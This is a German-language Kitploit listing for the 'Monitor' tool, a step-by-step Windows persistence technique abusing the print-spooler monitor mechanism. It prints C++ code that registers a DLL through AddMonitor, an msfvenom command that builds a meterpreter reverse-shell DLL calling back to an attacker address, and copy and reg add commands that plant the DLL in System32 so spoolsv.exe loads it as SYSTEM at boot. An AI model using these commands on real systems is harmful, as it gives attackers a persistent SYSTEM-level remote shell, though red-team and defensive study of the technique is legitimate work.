Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Monitor — A old way to Persistence | Kitploit
Tools/GitHubGitHub/al1ex/monitor
Privilege EscalationPayload GenerationPersistence MechanismsExploitationPost-ExploitationCommand and ControlRed Teaming
GitHubal1ex/monitor

Monitor

A old way to Persistence

Repository anzeigen
5310vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Projektbeschreibung

Wird zur Implementierung der Rechtepersistenz in der Post-Exploitation-Phase verwendet.

Verwendung des Projekts

Schritt 1: Laden Sie das Projekt herunter und kompilieren Sie anschließend Monitor.cpp mit VS. Sie können natürlich auch die bereits kompilierte Version verwenden. Der Code von Monitor.cpp lautet wie folgt:

root@kitploit:~
#include "Windows.h"

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
  • pName //Name des Monitors
  • pEnvironment //Umgebungsarchitektur
  • pDLLName //Name der Monitor-DLL-Datei

Schritt 2: Generieren Sie mit Msfvenom eine DLL-Payload:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll

test_dll

Schritt 3: Kopieren Sie shell.dll in das system32-Verzeichnis des Zielhosts und benennen Sie die Datei anschließend in test.dll um (das ist der oben genannte PDLLName; Sie können es auch nach Belieben ändern, ganz wie Sie möchten).

root@kitploit:~
copy C:\temp\shell.dll C:\Windows\System32\test.dll

copy

Schritt 4: Wechseln Sie anschließend in das system32-Verzeichnis und führen Sie den folgenden Befehl aus (Monitors.exe ist die zuvor kompilierte Datei und muss ebenfalls im system32-Verzeichnis abgelegt werden):

root@kitploit:~
Monitors.exe

Monitor

Schritt 5: Danach wird erfolgreich eine Meterpreter-Sitzung empfangen.

Meterpreter

Implementierung der Persistenz

Um Persistenz zu erreichen, müssen wir unter dem Registrierungsspeicherort "Monitors" einen Schlüssel (Key) anlegen:

root@kitploit:~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

Führen Sie anschließend in der Befehlszeile den folgenden Befehl aus, um einen Registrierungseintrag zu erstellen, der den Wert test.dll enthält. Überprüfen Sie im Registrierungseditor, ob der Schlüssel erstellt wurde:

root@kitploit:~
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

regedit

Beim nächsten Neustart lädt der spoolsv.exe-Prozess alle Treiber-DLL-Dateien, die im Registrierungseintrag Monitors vorhanden sind und im Windows-Ordner System32 gespeichert sind. Die folgende Abbildung zeigt, dass eine Meterpreter-Sitzung mit derselben Berechtigungsstufe wie der Print-Spooler-Dienst (SYSTEM) aufgebaut und aus dem System32-Ordner ausgeführt wurde.

shell

Tool herunterladen